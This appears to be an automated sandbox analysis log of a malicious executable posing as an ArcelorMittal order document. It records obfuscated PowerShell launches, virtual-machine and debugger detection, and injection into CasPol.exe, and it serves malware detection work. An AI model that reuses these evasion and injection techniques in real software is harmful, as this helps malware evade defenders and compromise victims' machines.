Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677

Tries to detect Any.run

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198062072.0000000000988000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198298116.00000000009B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEXE&
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe TID: 6644	Thread sleep time: -32300s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6080	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_02FA1EFB rdtsc

1_2_02FA1EFB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9940

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_00406375 FindFirstFileW,FindClose,	1_2_00406375
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405823
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_004027FB FindFirstFileW,	1_2_004027FB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	API call chain: ExitProcess graph end node			graph_1-14026
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	API call chain: ExitProcess graph end node			graph_1-14029

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198298116.00000000009B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exexe&
Source: CasPol.exe, 00000097.00000002.67422794406.000000000102B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: CasPol.exe, 00000097.00000002.67423364992.0000000001084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQ
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198062072.0000000000988000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exee
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000097.00000002.67423364992.0000000001084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_02FA1EFB rdtsc

1_2_02FA1EFB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA8AC0 mov eax, dword ptr fs:[00000030h]	1_2_02FA8AC0
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA8A45 mov eax, dword ptr fs:[00000030h]	1_2_02FA8A45
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FAD7F0 mov eax, dword ptr fs:[00000030h]	1_2_02FAD7F0
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA8B9E mov eax, dword ptr fs:[00000030h]	1_2_02FA8B9E
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA8B20 mov eax, dword ptr fs:[00000030h]	1_2_02FA8B20
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA8C16 mov ebx, dword ptr fs:[00000030h]	1_2_02FA8C16
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA8C16 mov eax, dword ptr fs:[00000030h]	1_2_02FA8C16
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FAF1DA mov eax, dword ptr fs:[00000030h]	1_2_02FAF1DA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process queried: DebugPort

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_02FAD80A LdrLoadDll,

1_2_02FAD80A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000

Jump to behavior

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C2A6B85 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x757367D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3332389F -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x43616EC9 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F63438D -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BFC -bxor 677	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Jump to behavior

